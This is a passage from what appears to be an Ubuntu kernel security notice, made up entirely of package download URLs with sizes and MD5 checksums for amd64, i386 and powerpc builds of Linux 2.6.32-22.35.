e5509ecca0fcfc8894c390bf92c93bc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.35_amd64.deb\n      Size/MD5: 30865592 448c8ed0e90302de8cc67d3c26ab4bec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-preempt_2.6.32-22.35_amd64.deb\n      Size/MD5: 31127336 95a46fb5b7b2a1490fb7f8dffc796665\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-server_2.6.32-22.35_amd64.deb\n      Size/MD5: 30941912 0da9825e4c58d53ada9c259bb30b0a1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.35_amd64.deb\n      Size/MD5: 12400736 63c330cd8f3013a2352ba69b55e091de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_amd64.deb\n      Size/MD5:   771326 cbcf12d3846a08c4aad270f94c2967ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_amd64.deb\n      Size/MD5:   188410 8ab096d110797b29ce0e55513d2cfc9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   179004 82935c201d651a8f2540b4509246dcc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   266266 62a5d101bf2df6cc46e07a6ac5c754f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    32456 f2cf533f43928805184e2e8445851764\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   330624 5d9e4a16d27efd75fe48f737d97709a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:  2379272 bc901048af3e41a52a1b6fdbcb07fd82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   163568 7a0da6ae3ce1dc89eb492b721114b041\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   245610 f228d86967c3c2f54793d67c3723df98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   179798 dc4938e5607f0ab8fac24b68b6cdc30c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    39240 9fe5999bb37261ec1eafaef688af802c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   150324 f8cbef960228695ddf3f44279d9f309d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    76634 d9ef1f8ece226b70bac378b406b2fd72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    22998 d4281699ad107f572718380f6f8854e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:     9744 c22fbc8081b2f5cb5ab4699ab799efe0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    41032 86840a3b7f62ba90fdd545ed0909a200\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   103692 0e4189f9ea0d93fa5bdcd0a59fca46ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:  1445188 1a3aefd74d49cac4a6c27f1df74e85fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    40680 cff9f81e2e76f3bd9f2b2bfb92a8b1ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    15420 e261cc78944c65be7ae4cf01206ed46a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    53056 a44b3cac618e304b5ec27fa1644ac6b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   134924 ac50fc239193b640db9fe2c8dfd8e25f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    16746 8ac42a73c7facd9dd40bbd9dae43f1ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    22362 df95e4cf43ff61bfdcd1b9c3260779cd\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306-ec2_2.6.32-306.11_i386.deb\n      Size/MD5:   621024 7b07a270215d6dd4e8d3893d74f08f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-306-ec2_2.6.32-306.11_i386.deb\n      Size/MD5: 19197386 b48d278dbd72f606b0bdee27cdfa461c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   207168 04f695e7bd431c95896ba7343d704c24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   212536 d34379185e1c36eb47b732fb8ff1db33\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34260 fac3ca7d3353a02c170c663a86817ab2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34560 de0b20e1fb34c4a605482afe4ccd383f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48026 b1b6503c8d2c69dba29c0e7212210553\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48042 b74910fe0c9fe6dedc55d616531e8e9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    43630 9c5855cb9e72e959a86bec59ca889a63\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    43654 5086f6f21c2eec63ee2dbae90e9006c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    47824 35033954fd15422a784c6a1502d0ed05\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    47892 8a1e2129f4c4199e97f50979db7a7303\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    90440 749f5096fa443cebaa5819e7dedfd15d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    90780 e01f7cac074601d43a87d2efed48f5f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34638 8fa9caf412924705ae079ecbf4581859\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34696 2f8fe16bbc0d3cc5a858c93f92e2ef65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   535026 9d4cbabe440b3b35dca15cab907c977a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   534774 9813309ab4c7c9cf97364bca8df2309e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   130862 d65ebfcedc44f8a18a2a6dbc728a0808\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   130886 a7b9ec1632f19a9bc991858b8522691f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    91586 dff28b0c21dbfd697f8f7cd153017f62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    91658 78956e99f332397bfcdc0d5ce6466ee6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   305268 20691a772242ecf4b853df1228b49b32\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   306204 6fb638d788f6ab1fee67c09fb0054274\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  4301526 9a01c667449a37d1daf3d1f01c0cbaed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  4430826 fabbe2cbce7e887e0da33b0ebf01c7c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-386_2.6.32-22.35_i386.deb\n      Size/MD5:   729628 a0c53de17e95532c4c748dcb8c3f8a82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb\n      Size/MD5:   729524 e1e5eef7b13c61550d8ba319ae41a0aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.35_i386.deb\n      Size/MD5:   727666 bec8fde6ea2236863fa2da253cc891d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-386_2.6.32-22.35_i386.deb\n      Size/MD5: 30921264 fe4dbe8391e9be16a08bde9f0d7a663a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb\n      Size/MD5: 31020332 1ebd2f8932847138aafb7ed3e6957c58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.35_i386.deb\n      Size/MD5: 30929116 e207e190177733b86d036e0bacd9279a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.35_i386.deb\n      Size/MD5: 11937042 f75a9af8e6b0b1395b8c85e675b25d3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_i386.deb\n      Size/MD5:   771288 818266f8a6808cc542c9245db590c703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_i386.deb\n      Size/MD5:   180486 579bada2cd54987719ae06e8269c176e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   182664 1ff8ed599a987d8a016a359412511d72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   182810 4711fddd17faed9cb7de1ec1d71fc53e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   249278 23dab95ffbc4b230ddc7f1c797a3bcb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   251962 fe10f470f29620ce2f54260684821bb8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    33842 b9dbe86e294a6f732c08965009591921\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    33864 eb80dbd858a2a1154de4670b63c33059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   310380 2382b6c171c0aa238ddb3df4a4ad8dfe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   310412 253a9da96c5fa7f006a3311187163630\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  2493630 c992b5a7a0c300009c416305f2e6ce01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  2511312 975b0287bf52ab17a32b804add8de75e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   147230 fbd3a7d9e0065703b8528bc452384621\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   147306 5039e5f46fed6adcbc78430a7f5136d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   228658 7ec7d48f3e42055a07e20e6e3e3142c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   228734 aa7e8172c565ca8124678fa9c9444a41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   165954 3e748608ea7b38c34be69c1ff91ad2a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   166012 f708e9e4ad641fa6275a5a3e535b06ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    36362 143f93890826df238056a1e5f43bc07a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    36486 13949aaa8ad32338fff3c56ad0780c9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   156928 9888f0f521ed580da0aa3eee88db9ee9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   157200 14718c7817980def8cefe742fc25f4b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    90206 9b4f0a5ae4ecc56928710578948e8aa8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    91098 72d98fe1c957a6533d0e92bcd9df126f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48114 c156299aa317a60124657975ba0422cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48158 41a0c6cdd72641fc6327c91e2a41303e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:     9106 b3c84333d67154196fe492330ec937f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:     9112 c6d1478d99deba24df0f1abc7a1c6360\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37450 d41485700623523bc62b122a67f57f37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37472 8c553307ba6fec0874a4767f46eac97c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    93834 49462cab3b38d4e445456e6496f688e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    94402 a0ab7d68e42751978e478e46b39c8b58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  1555960 02d24e085fcacdc34b770d8e4b3e60c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  1506776 e05a832ffa4bb240518968c28eb05fd2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37966 d5bd6c357df20158f33dc5d8b898786e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37970 b1917a566671571351108712ea8b7cea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    15568 0094f62a06418771e1b7ce988e5229dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    15580 5f1e986aa2e88d63d62322ec85e8da17\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    50002 d7a47201c272480d804ab92e91a9c00f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    50056 08be19a737d5c6b1b99b21c072e28d75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   123832 091e7733c12a45745381b4fe35d3640b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   124268 2e5ad0b6c7b80907a9927bb37446aa06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    15488 0afa442071262b64ba4fbfe594b44306\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:     5710 b999ccf838edc897b8874914e3f25148\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    20788 7140a98dd26b05e5278d938a02b9af4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    20798 a2cab82a0956e6ec96375cd9f6e23a29\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   340852 5448ca0d59837472e8062a7758249b05\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   281626 20cdb99682c1f387eedd2dfdccc39c0b\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    60558 30fa795c08458a313f3a04c3ac06b833\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    68708 65c5e7b743e6e041e55ab080726e6326\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    48390 9d549e434d1f43ca803c400337537735\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    53128 e1b19e86e96b2a705f52257d0ba3e446\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    96780 69931c2ff42e93b841cbc39040b5f30b\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   109864 55530222d62b149471f8f7ec0a0b401c\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    41000 e504306368b70e7b1d4080fb9f104774\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    40386 867836bfd128cb699b6084d22ae5b9ba\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   598544 7c74713ce524ca6056f98b948ba1009d\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   631378 f6d7ccfc08940e0f182d7c347aa6fe1b\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   155250 5e58765f9014ac1b91db52377be3214e\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   150514 1c673dcbb00b8bdb03c140e2c16c1c0b\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   106286 f66ae752322b3a80afd81acce9678c54\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   110218 b81a7936f5d028e6e2d1b0c66ec67a82\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   418794 7614b2ba143ebc43a4df17d3a553f07c\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   355170 c461e16d2638bbd922ba08faa3aadb1f\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  4184440 fcf9a52cf7d828353fc20fc42f04074e\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  5568942 e1244e4847aa34cefffd29c5e69d17da\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5:   834094 d2a5a47fe19b15efcbade3a458886100\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5:   853586 41d8ab0b3bac34b9ef18b3bd1751c06a\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb\n      Size/MD5:   834092 e1e2aa29e1424aef7ee116b1aa782e44\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5: 27690922 d93d95c548c34b5632bddc5f69e7c400\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb\n      Size/MD5: 28531758 631a3347cb263b30bbac36ecfc73b928\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb\n      Size/MD5: 27421200 9068bbc77af845ca5b609d63bacd3308\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_powerpc.deb\n      Size/MD5:   760646 0e4b57d343052f30433529cbe14385ab\n    http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_powerpc.deb\n      Size/MD5:   196496 08665e49676e012315b941d37f838812\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   289406 e171a625ccdacd6709fee1c6e116e3bf\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   310398 ac3b6dacc77e4002ca825e265bbedea2\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   221150 6a0092ae1be40ca9ee127b2232d15cb0\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   223804 af7ba0faf09abaf57945a5e7fc2ee506\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    31938 5101007b3b2c9c45eb839952ff705786\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    36496 5dbc40f2acca40498c173d0886f9c2fb\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   343926 8c91a96bd0c3c6cc134532d13fd3d37e\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   385810 4a30a8fe1a7d7c1367938575c185f169\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  2173120 cb265da97dfe62f146fd1fe41ebfc1f9\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:  2372824 8525c63c57d9345520be8210544f214c\n    